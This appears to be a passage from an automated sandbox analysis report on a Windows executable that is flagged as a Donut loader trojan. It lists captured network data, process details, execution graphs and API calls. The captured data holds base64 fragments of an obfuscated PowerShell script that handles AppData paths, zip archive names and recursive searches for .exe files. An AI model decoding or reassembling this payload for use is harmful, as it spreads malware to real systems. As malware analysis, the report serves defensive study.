                                                                                                          Data Ascii: BhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAQQBwAFAARABBAFQAYQBQAGEAVABIACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAGMARwAwAFEAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUACcAKwAnAFYAZQBsAFQAVgAsAGwAVABWAEMAbwBtAGIAaQBuACcAKwAnAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAe
                                                                                                          2024-12-13 15:48:54 UTC1369INData Raw: 30 41 45 55 41 51 67 42 56 41 47 30 41 62 51 41 6e 41 43 73 41 4a 77 42 77 41 48 30 41 4c 41 41 67 41 44 59 41 55 77 42 32 41 45 51 41 65 51 42 46 41 48 55 41 62 67 42 70 41 43 63 41 4b 77 41 6e 41 48 45 41 64 51 42 6c 41 45 59 41 62 77 42 73 41 47 51 41 5a 51 42 79 41 45 34 41 59 51 42 74 41 43 63 41 4b 77 41 6e 41 47 55 41 4c 67 42 36 41 47 6b 41 63 41 41 32 41 46 4d 41 64 67 41 70 41 43 6b 41 43 67 41 67 41 43 41 41 49 41 41 67 41 43 41 41 49 41 41 6f 41 43 41 41 49 41 42 6e 41 45 4d 41 61 51 41 67 41 43 67 41 4e 67 42 54 41 48 59 41 64 67 42 42 41 44 59 41 55 77 42 32 41 43 73 41 4e 67 42 54 41 48 59 41 63 67 41 32 41 46 4d 41 64 67 41 72 41 44 59 41 55 77 42 32 41 47 6b 41 51 51 42 69 41 47 77 41 5a 51 41 36 41 46 55 41 59 67 41 79 41 45 63 41 56 41
                                                                                                          Data Ascii: 0AEUAQgBVAG0AbQAnACsAJwBwAH0ALAAgADYAUwB2AEQAeQBFAHUAbgBpACcAKwAnAHEAdQBlAEYAbwBsAGQAZQByAE4AYQBtACcAKwAnAGUALgB6AGkAcAA2AFMAdgApACkACgAgACAAIAAgACAAIAAoACAAIABnAEMAaQAgACgANgBTAHYAdgBBADYAUwB2ACsANgBTAHYAcgA2AFMAdgArADYAUwB2AGkAQQBiAGwAZQA6AFUAYgAyAEcAVA
                                                                                                          2024-12-13 15:48:54 UTC1369INData Raw: 41 48 6b 41 52 51 42 37 41 48 4d 41 61 41 42 43 41 46 55 41 62 51 42 6c 41 47 77 41 62 41 42 39 41 43 34 41 4b 41 41 32 41 46 4d 41 64 67 42 37 41 44 41 41 66 51 42 37 41 44 45 41 66 51 42 37 41 44 49 41 66 51 41 32 41 46 4d 41 4a 77 41 72 41 43 63 41 64 67 41 6e 41 43 73 41 4a 77 41 67 41 43 30 41 5a 67 42 73 41 46 51 41 56 67 42 4f 41 47 45 41 62 51 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 47 55 41 55 77 42 77 41 47 45 41 62 41 42 55 41 46 59 41 4c 41 42 73 41 46 51 41 56 67 42 6a 41 47 55 41 62 41 42 55 41 46 59 41 4b 51 41 75 41 45 6b 41 62 67 42 32 41 47 38 41 61 77 42 6c 41 43 67 41 52 41 42 35 41 45 55 41 65 77 42 30 41 45 55 41 62 51 42 77 41 48 6f 41 51 67 42 56 41 47 30 41 53 51 42 51 41 48 41 41 51 51 42 43 41 46 55 41 62 51 42
                                                                                                          Data Ascii: AHkARQB7AHMAaABCAFUAbQBlAGwAbAB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAJwArACcAdgAnACsAJwAgAC0AZgBsAFQAVgBOAGEAbQBsAFQAVgAsAGwAVABWAGUAUwBwAGEAbABUAFYALABsAFQAVgBjAGUAbABUAFYAKQAuAEkAbgB2AG8AawBlACgARAB5AEUAewB0AEUAbQBwAHoAQgBVAG0ASQBQAHAAQQBCAFUAbQB
                                                                                                          2024-12-13 15:48:54 UTC1331INData Raw: 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 45 4d 41 61 41 42 70 41 47 77 41 5a 41 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 43 63 41 4b 77 41 6e 41 48 51 41 5a 51 42 74 41 47 77 41 56 41 42 57 41 43 6b 41 49 41 41 74 41 43 63 41 4b 77 41 6e 41 45 59 41 61 51 42 73 41 48 51 41 5a 51 42 79 41 43 41 41 4b 67 41 75 41 45 49 41 56 51 42 74 41 47 55 41 57 41 42 46 41 43 41 41 4c 51 42 53 41 47 55 41 59 77 42 31 41 48 49 41 63 77 42 6c 41 43 41 41 4c 51 42 51 41 47 45 41 64 41 42 6f 41 43 41 41 52 41 42 35 41 45 55 41 65 77 42 68 41 46 41 41 51 67 42 56 41 47 30 41 63 41 42 43 41 46 55 41 62 51 42 6b 41 47 45 41 51 67 42 56 41 47 30 41 56 41 42 42 41 46 41 41 51 51 42 55 41 47 67 41 66 51 41 70 41 41 6f 41 49 41 41 67 41 43 41 41 49 41 42 6d
                                                                                                          Data Ascii: FQAVgAsAGwAVABWAEMAaABpAGwAZABsAFQAVgAsAGwAVABWACcAKwAnAHQAZQBtAGwAVABWACkAIAAtACcAKwAnAEYAaQBsAHQAZQByACAAKgAuAEIAVQBtAGUAWABFACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAARAB5AEUAewBhAFAAQgBVAG0AcABCAFUAbQBkAGEAQgBVAG0AVABBAFAAQQBUAGgAfQApAAoAIAAgACAAIABm


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Target ID:0
                                                                                                          Start time:10:48:13
                                                                                                          Start date:13/12/2024
                                                                                                          Path:C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\BDxsBr8Dce.exe"
                                                                                                          Imagebase:0x770000
                                                                                                          File size:15'643'816 bytes
                                                                                                          MD5 hash:94842B12F4A0647DB302A5ACD53758D7
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3236849653.0000000001C10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:0.1%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:6.5%
                                                                                                            Total number of Nodes:93
                                                                                                            Total number of Limit Nodes:5
                                                                                                            execution_graph 63145 1105f80 63167 111776d 63145->63167 63147 1105f85 ___lock_fhandle 63171 1112377 GetStartupInfoW 63147->63171 63149 1105f9b 63173 1114949 GetProcessHeap 63149->63173 63151 1105ff3 63174 111557a 63151->63174 63153 1106004 __RTC_Initialize 63195 1116a9e 63153->63195 63155 110601e GetCommandLineA 63214 1117849 64 API calls 2 library calls 63155->63214 63158 110603a 63215 11171f6 70 API calls 3 library calls 63158->63215 63160 1106044 63216 1117425 69 API calls 6 library calls 63160->63216 63162 1106055 63217 1109266 69 API calls 5 library calls 63162->63217 63164 1106068 63218 11178d6 69 API calls 2 library calls 63164->63218 63166 1106079 63168 1117790 63167->63168 63169 111779d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 63167->63169 63168->63169 63170 1117794 63168->63170 63169->63170 63170->63147 63172 111238d 63171->63172 63172->63149 63173->63151 63219 11092fe 36 API calls 2 library calls 63174->63219 63176 111557f 63220 1110bd7 InitializeCriticalSectionAndSpinCount ___lock_fhandle 63176->63220 63178 1115584 63179 1115588 63178->63179 63222 11122f9 TlsAlloc 63178->63222 63221 11155f0 TlsFree __mtterm 63179->63221 63183 111559a 63183->63179 63184 11155a5 63183->63184 63223 11121d2 63184->63223 63187 11155e7 63231 11155f0 TlsFree __mtterm 63187->63231 63190 11155c6 63190->63187 63192 11155cc 63190->63192 63230 11154c7 59 API calls 4 library calls 63192->63230 63194 11155d4 GetCurrentThreadId 63194->63153 63196 1116aaa ___lock_fhandle 63195->63196 63243 1110aa6 63196->63243 63198 1116ab1 63199 11121d2 __calloc_crt 59 API calls 63198->63199 63201 1116ac2 63199->63201 63200 1116b2d GetStartupInfoW 63208 1116b42 63200->63208 63209 1116c71 63200->63209 63201->63200 63202 1116acd ___lock_fhandle @_EH4_CallFilterFunc@8 63201->63202 63202->63155 63203 1116d39 63252 1116d49 LeaveCriticalSection _doexit 63203->63252 63205 11121d2 __calloc_crt 59 API calls 63205->63208 63206 1116cbe GetStdHandle 63206->63209 63207 1116cd1 GetFileType 63207->63209 63208->63205 63208->63209 63210 1116b90 63208->63210 63209->63203 63209->63206 63209->63207 63251 111239a InitializeCriticalSectionAndSpinCount 63209->63251 63210->63209 63211 1116bc4 GetFileType 63210->63211 63250 111239a InitializeCriticalSectionAndSpinCount 63210->63250 63211->63210 63214->63158 63215->63160 63216->63162 63217->63164 63218->63166 63219->63176 63220->63178 63222->63183 63224 11121d9 63223->63224 63226 1112214 63224->63226 63228 11121f7 63224->63228 63232 1117941 63224->63232 63226->63187 63229 1112355 TlsSetValue 63226->63229 63228->63224 63228->63226 63240 11126a1 Sleep 63228->63240 63229->63190 63230->63194 63233 1117967 63232->63233 63234 111794c 63232->63234 63237 1117977 RtlAllocateHeap 63233->63237 63238 111795d 63233->63238 63242 1114880 DecodePointer 63233->63242 63234->63233 63235 1117958 63234->63235 63241 110616f 59 API calls __getptd_noexit 63235->63241 63237->63233 63237->63238 63238->63224 63240->63228 63241->63238 63242->63233 63244 1110ab7 63243->63244 63245 1110aca EnterCriticalSection 63243->63245 63253 1110b2e 59 API calls 9 library calls 63244->63253 63245->63198 63247 1110abd 63247->63245 63254 110922c 59 API calls 4 library calls 63247->63254 63249 1110ac9 63249->63245 63250->63210 63251->63209 63252->63202 63253->63247 63254->63249 63255 fe04b0 63256 fe0568 63255->63256 63257 fe04e3 63255->63257 63257->63256 63267 fdeff0 73 API calls 2 library calls 63257->63267 63259 fe04f1 63259->63256 63260 fe0500 63259->63260 63272 fdf350 73 API calls 2 library calls 63259->63272 63268 fdc2d0 63260->63268 63262 fe0509 63262->63260 63273 103a700 80 API calls 63262->63273 63264 fe053f 63264->63256 63274 103a8c0 89 API calls 63264->63274 63267->63259 63269 fdc28c 63268->63269 63269->63268 63270 fdc962 VirtualAlloc 63269->63270 63271 fdc97b 63270->63271 63271->63264 63272->63262 63273->63260 63274->63256

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(-015DAF1F,00036E90,-C1620872,?,00FE0155,?), ref: 00FDC962
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 036c3a74c12e838d6d99cc3d62897f996db727f828d9f660cbd13e7c7c4c506b
                                                                                                            • Instruction ID: 1ca1f969f366abd3b0329f4e767bc6e191bd3785eadfe9b706ba2780aebb6595
                                                                                                            • Opcode Fuzzy Hash: 036c3a74c12e838d6d99cc3d62897f996db727f828d9f660cbd13e7c7c4c506b
                                                                                                            • Instruction Fuzzy Hash: FC220F368123248FD738EF75E98616B3762FB803013479629E4628F14EDF78544AEBC6

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • ___security_init_cookie.LIBCMT ref: 01105F80
                                                                                                            • ___crtGetShowWindowMode.LIBCMT ref: 01105F96
                                                                                                              • Part of subcall function 01112377: GetStartupInfoW.KERNEL32(?), ref: 01112381
                                                                                                              • Part of subcall function 01114949: GetProcessHeap.KERNEL32(01105FF3,0158FED8,00000014), ref: 01114949
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInfoModeProcessShowStartupWindow___crt___security_init_cookie
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192242368-0
                                                                                                            • Opcode ID: ccddf4b6ad64d76f8f408bfcd5181eaa9823d5bbba4ead45dd31502f6204cebb
                                                                                                            • Instruction ID: 70685d5c45dccec2fe47c8458fc6bd3c026544168bb1af7464d6a08f591e7b22
                                                                                                            • Opcode Fuzzy Hash: ccddf4b6ad64d76f8f408bfcd5181eaa9823d5bbba4ead45dd31502f6204cebb
                                                                                                            • Instruction Fuzzy Hash: 6D01B570E4030389EBAFB7B59944739B5A56F2079DF104039E905C96CAFBF8C480CB62

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0108A6D5
                                                                                                            • GetProcAddress.KERNEL32(00000000,LookupAccountSidW), ref: 0108A6E2
                                                                                                            • GetProcAddress.KERNEL32(00000000,BuildTrusteeWithSidW), ref: 0108A6EF
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetEffectiveRightsFromAclW), ref: 0108A6FC
                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?), ref: 0108A710
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0108A736
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0108A75B
                                                                                                            • _malloc.LIBCMT ref: 0108A76A
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?), ref: 0108A783
                                                                                                            • GetLengthSid.ADVAPI32(?,?,?,?,?), ref: 0108A794
                                                                                                            • _malloc.LIBCMT ref: 0108A79D
                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 0108A7AD
                                                                                                            • _free.LIBCMT ref: 0108A7D0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0108A7DC
                                                                                                            • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 0108A7E8
                                                                                                              • Part of subcall function 00FE6540: GetCurrentThreadId.KERNEL32 ref: 00FE6563
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserProfileDirectoryW), ref: 0108A849
                                                                                                            • LoadLibraryW.KERNEL32(kernel32,?,?,?,?,?), ref: 0108A855
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetVolumePathNamesForVolumeNameW), ref: 0108A865
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Token$CurrentInformationProcess_malloc$CloseCopyHandleLengthLibraryLoadOpenThread_free
                                                                                                            • String ID: AllocateAndInitializeSid$BuildTrusteeWithSidW$GetEffectiveRightsFromAclW$GetNamedSecurityInfoW$GetUserProfileDirectoryW$GetVolumePathNamesForVolumeNameW$LookupAccountSidW$advapi32$kernel32$userenv
                                                                                                            • API String ID: 2072111544-3103641746
                                                                                                            • Opcode ID: 5832a539ad691ae488a4fa2cbe5a95a53e8c2432bcced01e97b33655204c1de9
                                                                                                            • Instruction ID: 8d94bf15ba6a65de7a9510195a20b4ad214c807860c0221b51d0148ada6bac8a
                                                                                                            • Opcode Fuzzy Hash: 5832a539ad691ae488a4fa2cbe5a95a53e8c2432bcced01e97b33655204c1de9
                                                                                                            • Instruction Fuzzy Hash: 8051EFB0A15301EFE730BF75DC49B1A3AF4AB44B40F10042EF5929B290EBB5D549DBA6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6d01249a16d5982376a6699f07874c465fa29941e02cd2efc27e7133f552c80
                                                                                                            • Instruction ID: 1f7285fb97296f5f9e2de15cf4fa595ee88e405388690a02a1ce0ec95ce6fad2
                                                                                                            • Opcode Fuzzy Hash: d6d01249a16d5982376a6699f07874c465fa29941e02cd2efc27e7133f552c80
                                                                                                            • Instruction Fuzzy Hash: 4342C170A047029FE758CF2CC88476ABBE1FF84304F144AADE9958B641E371E955CBD9
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: No space left on device$No such file or directory$Permission denied$The specified module could not be found.$Too many open files
                                                                                                            • API String ID: 1452528299-3654939424
                                                                                                            • Opcode ID: 6b0b8026a3372bc21a6d18f363f8039b6aa18108b78ef172dcac72f8a5d9fd60
                                                                                                            • Instruction ID: 3d5e5f8f62bcb4eaaef1b37c214c2b5c1d1deac2ed0f2766b7a0d79c15dd2bc6
                                                                                                            • Opcode Fuzzy Hash: 6b0b8026a3372bc21a6d18f363f8039b6aa18108b78ef172dcac72f8a5d9fd60
                                                                                                            • Instruction Fuzzy Hash: EF51CE74608300EFDB28DF18D845B5A77A4EF85334F148A1EF96E9B3E0CB34A8459B52
                                                                                                            Strings
                                                                                                            • QDateTimeParser::parse Internal error 4 (%s), xrefs: 01052AAC
                                                                                                            • QDateTimeParser::parse Internal error 2, xrefs: 01051F65
                                                                                                            • QDateTimeParser::parse Internal error 3 (%s %s), xrefs: 010525C0
                                                                                                            • QDateTimeParser::parse Internal error (%s), xrefs: 01051E38
                                                                                                            • <, xrefs: 01052D3F
                                                                                                            • ;, xrefs: 01052D26
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __allrem_free
                                                                                                            • String ID: ;$<$QDateTimeParser::parse Internal error (%s)$QDateTimeParser::parse Internal error 2$QDateTimeParser::parse Internal error 3 (%s %s)$QDateTimeParser::parse Internal error 4 (%s)
                                                                                                            • API String ID: 3658420712-3385654267
                                                                                                            • Opcode ID: 5b7811b8eb6800ea0727ff1ead184b2493fec1034b6f46cbd0b38bba47e941d7
                                                                                                            • Instruction ID: 00a35360c1c878d0012a63c87e50e499fa6fe2a4f0098933416052e4cd792c1f
                                                                                                            • Opcode Fuzzy Hash: 5b7811b8eb6800ea0727ff1ead184b2493fec1034b6f46cbd0b38bba47e941d7
                                                                                                            • Instruction Fuzzy Hash: 4CC2BF30508341DFEBA5DB28C881BAFBBE4BF85314F044A6DF9D987291EB749944CB52
                                                                                                            APIs
                                                                                                            • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 01092686
                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 010927D2
                                                                                                            Strings
                                                                                                            Memory Dump Source
